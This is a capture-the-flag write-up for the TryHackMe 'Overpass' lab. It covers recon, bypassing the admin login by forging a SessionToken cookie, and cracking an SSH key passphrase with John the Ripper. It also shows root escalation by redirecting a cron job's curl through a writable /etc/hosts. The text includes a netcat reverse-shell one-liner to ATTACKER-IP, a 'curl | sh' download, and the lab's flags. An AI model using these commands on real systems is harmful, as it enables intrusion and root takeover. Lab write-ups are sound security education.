# THM Overpass1 Write-up ## nmap We can use `nmap -v -sV -sC -T4 10.10.249.77` ``` PORT   STATE SERVICE VERSION 22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) |   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-favicon: Unknown favicon MD5: 0D4315E5A0B066CEFD5B216C8362564B | http-methods: |_  Supported Methods: GET HEAD POST OPTIONS |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` On visiting the IP (port 80) through browser we get the following page ![](https://i.imgur.com/J7OjCCe.png) --- We also have **ssh** service open. It might be useful later. ## gobuster Using gobuster as follows `gobuster -u http://10.10.249.77/ -w /home/shivam/wordlists/common.txt -t 100` We get ``` ===================================================== Gobuster v2.0.1              OJ Reeves (@TheColonial) ===================================================== [+] Mode         : dir [+] Url/Domain   : http://10.10.249.77/ [+] Threads      : 100 [+] Wordlist     : /home/shivam/wordlists/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout      : 10s ===================================================== 2022/06/23 22:47:51 Starting gobuster ===================================================== /aboutus (Status: 301) /admin (Status: 301) /css (Status: 301) /downloads (Status: 301) /img (Status: 301) /index.html (Status: 301) ===================================================== 2022/06/23 22:48:06 Finished ===================================================== ``` ## Web exploitation On visiting above found pages, **/admin** page seems interesting ![](https://i.imgur.com/08putco.png) --- Lets check out the source code for the page ![](https://i.imgur.com/sJ4RZl6.png) We can see three scripts. 1\. main.js 2\. login.js 3\. cookie.js Lets check out **login.js** ``` async function postData(url = '', data = {}) {     // Default options are marked with *     const response = await fetch(url, {         method: 'POST', // *GET, POST, PUT, DELETE, etc.         cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached         credentials: 'same-origin', // include, *same-origin, omit         headers: {             'Content-Type': 'application/x-www-form-urlencoded'         },         redirect: 'follow', // manual, *follow, error         referrerPolicy: 'no-referrer', // no-referrer, *client         body: encodeFormData(data) // body data type must match "Content-Type" header     });     return response; // We don't always want JSON back } const encodeFormData = (data) => {     return Object.keys(data)         .map(key => encodeURIComponent(key) + '=' + encodeURIComponent(data[key]))         .join('&'); } function onLoad() {     document.querySelector("#loginForm").addEventListener("submit", function (event) {         //on pressing enter         event.preventDefault()         login()     }); } async function login() {     const usernameBox = document.querySelector("#username");     const passwordBox = document.querySelector("#password");     const loginStatus = document.querySelector("#loginStatus");     loginStatus.textContent = ""     const creds = { username: usernameBox.value, password: passwordBox.value }     const response = await postData("/api/login", creds)     const statusOrCookie = await response.text()     if (statusOrCookie === "Incorrect credentials") {         loginStatus.textContent = "Incorrect Credentials"         passwordBox.value=""     } else {         Cookies.set("SessionToken",statusOrCookie)         window.location = "/admin"     } } ``` The last **else** statement seems intersting. The Hint for user flag says: `OWASP Top 10 Vuln! Do NOT bruteforce.` Hence this might be [**Broken Authentication**](https://code-maze.com/owasp-broken-authentication/) one of the TOP 10 OWASP vulnerabilities. Here we can access the admin page by simply setting a cookie name **SessionToken** and value as anything we want (even null value works). ![](https://i.imgur.com/v9nSlMK.png) On saving the cookie and reloading the page we are taken to the admin page. ![](https://i.imgur.com/cO2siAE.png) --- ## ssh On the admin page we are provided with a ssh private key which can be used to login to ssh. Lets save the private key in a file named **privatekey**. Change the permission of the file. `chmod 700 privatekey` On the admin page we ca also observe the username for ssh login which is **james** Lets try to login `ssh -i privatekey james@10.10.249.77` ![](https://i.imgur.com/HlMeDI8.png) It asks for a paraprase. The paraphrase can be cracked using **JohnTheRipper** We can use **ssh2john** to get the hash for the private key and write it into a file `ssh2john privatekey > privatekey.hash` Lets crack the private key `john privatekey.hash --wordlist=/usr/share/wordlists/rockyou.txt` ![](https://i.imgur.com/o6c0xAw.png) Hence the passphrase for private key is >james13 We can login to ssh using this and hence get the user flag ![](https://i.imgur.com/TjTpUs9.png) ``` james@overpass-prod:~$ ls todo.txt  user.txt james@overpass-prod:~$ cat user.txt thm{65c1aaf000506e56996822c6281e6bf7} ``` The user flag is: > thm{65c1aaf000506e56996822c6281e6bf7} ## Privilage Escalation We can use **LinPEAS** to check possible ways of privilage escalation Download LinPEAS on local system using `wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh` Host a simple python server on local system `sudo python3 -m http.server 80` Downloaf the script into the target system `curl 10.18.***.***/linpeas.sh | sh` Under **cronjobs** we see an interesting task ![](https://i.imgur.com/KKX4HtI.png) It is making curl request to a host **overpass.thm** for the file **buildscript.sh** Also we can see that the file which store the IPs of hosts **/etc/hosts** is **writable**. ![](https://i.imgur.com/3yN6NN7.png) *We can change the IP of overpass.thm to the IP of our local machine and make an identical file system (downloads/src/buildcript.sh) but the file buildscript.sh will contain the code for reverse shell which will be executed as root* - Make a similar file system     `mkdir ./downloads/src` - Make a file **./downloads/src/buildscript.sh** with reverse shell.     We can take reverse shell from [reverseshell.com](https://www.revshells.com/) ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ATTACKER-IP PORT >/tmp/f ``` - Host simple python http server     `sudo python3 -m http.server 80`     Make sure the server is being hosted in the parent directory of *downloads* directory. - Listen of the specified port on local machine     `nc -lvnp PORT` - Change the IP to your own ``` james@overpass-prod:~$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 overpass-prod 127.0.0.1 overpass.thm # The following lines are desirable for IPv6 capable hosts ::1     ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters james@overpass-prod:~$ vim /etc/hosts james@overpass-prod:~$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 overpass-prod 10.18.118.144 overpass.thm # The following lines are desirable for IPv6 capable hosts ::1     ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters ``` Now we just have to wait for cronjob to make request It makes the request ``` shivam@ubuntu:/$ sudo python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.249.77 - - [24/Jun/2022 00:48:02] "GET /downloads/src/buildscript.sh HTTP/1.1" 200 - ``` And we get the shell ![](https://i.imgur.com/DMA7ZCf.png) The root falg is: > thm{7f336f8c359dbac18d54fdd64ea753bb}